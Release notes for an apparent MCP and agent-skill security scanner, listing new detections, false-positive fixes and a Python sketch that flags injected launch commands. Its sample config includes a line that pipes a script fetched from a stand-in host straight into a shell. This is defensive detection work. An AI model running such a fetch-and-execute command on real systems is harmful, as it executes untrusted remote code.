Threat-coverage refresh aligned with the 2026 MCP and agent-skill disclosure wave, plus a false-positive sweep against the top-50 MCP ecosystem.
New detections
- CMCP-005 MCP launch-command injection (shell wrappers, pipe-to-interpreter, chained operators). Covers the OX Security STDIO RCE class.
- CMCP-006 known-vulnerable MCP package denylist, version-aware (NVD-verified: CVE-2025-49596, CVE-2026-41497, CVE-2026-5059).
- Base64/hex encoded-secret decoding in the credential scanner.
- Agent identity-file write detection (MEMORY.md, AGENTS.md, SOUL.md) per OWASP Agentic Skills AST04.
- JS/TS dangerous patterns in the skill scanner (eval/Function, child_process, dynamic require, process.env enumeration).
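
As an added illustration of the CMCP-005 class (not the scanner's own code or rule set), the sketch below checks launch commands in an mcpServers-style JSON config for the three patterns named above. The function names, finding labels, regexes and sample config are all constructed for this example.

```python
import json
import re

# Heuristics below are assumptions for illustration, not the project's rules.
SHELLS = {"sh", "bash", "zsh", "dash", "cmd", "cmd.exe", "powershell", "pwsh"}
INLINE_FLAGS = {"-c", "/c", "-command"}
CHAIN = re.compile(r"&&|\|\||;|`|\$\(")
# A single "|" (not "||") feeding an interpreter.
PIPE_TO_INTERP = re.compile(
    r"(?<!\|)\|(?!\|)\s*(?:sudo\s+)?(?:sh|bash|zsh|python[\d.]*|node|perl|ruby)\b")

def check_launch(command, args):
    """Return sorted finding labels for one server's command and args."""
    findings = set()
    # Some configs put the whole command line in "command"; split it too.
    tokens = command.split() + list(args)
    base = re.split(r"[\\/]", tokens[0])[-1].lower() if tokens else ""
    if base in SHELLS and any(t.lower() in INLINE_FLAGS for t in tokens[1:]):
        findings.add("shell-wrapper")
    for text in [command, *args]:
        if PIPE_TO_INTERP.search(text):
            findings.add("pipe-to-interpreter")
        if CHAIN.search(text):
            findings.add("chained-operator")
    return sorted(findings)

def scan_config(config):
    """Map each server name under "mcpServers" to its findings."""
    results = {}
    for name, entry in config.get("mcpServers", {}).items():
        args = [str(a) for a in entry.get("args", [])]
        results[name] = check_launch(str(entry.get("command", "")), args)
    return results

# Constructed sample config; server names, package and URL are placeholders.
SAMPLE = json.loads("""{
  "mcpServers": {
    "plain":   {"command": "npx", "args": ["-y", "example-mcp-server", "/srv/data"]},
    "wrapped": {"command": "bash",
                "args": ["-c", "curl -s https://example.invalid/i.sh | sh"]},
    "chained": {"command": "node", "args": ["server.js", "&&", "echo", "constructed"]}
  }
}""")

if __name__ == "__main__":
    for server, found in scan_config(SAMPLE).items():
        print(server, found or "ok")
```

The chained-operator check is deliberately broad: a legitimate argument containing ";" will match, so its findings need review before they are treated as confirmed.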
Scanner updates
- OpenAI sk-admin- keys; Google AIza keys raised to CRITICAL (Gemini access since Feb 2026).
False-positive fixes (top-50 ecosystem scan: critical 17 -> 1, high 15 -> 3)
- Fixture/snapshot dirs, bare tests.rs/test.rs, and secrets inside test functions are treated as test context.
- Secret-scanner allowlist configs (.gitguardian.yaml, .gitleaks.toml, ...) recognized as example context.
- Self-describing kebab/snake placeholder keys suppressed.
- Loopback connection/basic-auth strings treated as dev scaffolding.
- JS/TS child_process calibrated to MEDIUM; identity-file code-exec check requires call syntax.
Hardening
- Connection-string regex rewritten to remove a ReDoS risk; four broad exception handlers narrowed to log instead of swallow.
Full details in CHANGELOG.md. 653 tests passing.